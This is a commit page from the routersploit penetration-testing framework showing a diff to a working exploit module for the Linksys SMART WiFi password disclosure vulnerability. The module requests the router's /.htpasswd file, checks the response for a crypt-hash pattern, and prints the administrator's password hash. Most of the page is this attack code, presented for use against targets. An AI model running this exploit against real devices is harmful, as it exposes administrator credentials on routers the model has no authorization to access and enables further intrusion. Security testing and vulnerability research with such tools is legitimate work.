Skip to content

R
routersploit
Commit 24a4151d by Marcin Bury
Options

Fixing Linksys Smartwifi exploit

parent 2357038e
Showing with 16 additions and 7 deletions
routersploit/modules/exploits/linksys/smartwifi_password_disclosure.py
...@@ -7,6 +7,7 @@ from routersploit import ( ...@@ -7,6 +7,7 @@ from routersploit import (
http_request, http_request,
print_info, print_info,
print_success, print_success,
print_error,
) )
...@@ -16,12 +17,12 @@ class Exploit(exploits.Exploit): ...@@ -16,12 +17,12 @@ class Exploit(exploits.Exploit):
If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash
""" """
__info__ = { __info__ = {
'name': '', 'name': 'Linksys SMART WiFi Password Disclosure',
'authors': [ 'authors': [
'Sijmen Ruwhof', # vulnerability discovery 'Sijmen Ruwhof', # vulnerability discovery
'0BuRner', # routersploit module '0BuRner', # routersploit module
], ],
'description': '', 'description': 'Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. If target is vulnerable administrator\'s MD5 passsword is retrieved.',
'references': [ 'references': [
'https://www.kb.cert.org/vuls/id/447516', 'https://www.kb.cert.org/vuls/id/447516',
'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers', 'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers',
...@@ -46,16 +47,24 @@ class Exploit(exploits.Exploit): ...@@ -46,16 +47,24 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port') port = exploits.Option(80, 'Target Port')
def run(self): def run(self):
url = "{}:{}/.htpasswd".format(self.target, self.port) if self.check():
response = http_request(method="GET", url=url) print_success("Target seems to be vulnerable")
print_info("Unix crypt hash: $id$salt$hashed") # See more at http://man7.org/linux/man-pages/man3/crypt.3.html url = "{}:{}/.htpasswd".format(self.target, self.port)
print_success("Hash found:", response.text) response = http_request(method="GET", url=url)
if response is None:
print_error("Exploit failed - connection error")
return
print_info("Unix crypt hash: $id$salt$hashed") # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
print_success("Hash found:", response.text)
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute @mute
def check(self): def check(self):
url = "{}:{}/.htpasswd".format(self.target, self.port) url = "{}:{}/.htpasswd".format(self.target, self.port)
response = http_request(method="HEAD", url=url) response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200: if response is not None and response.status_code == 200:
res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text) res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment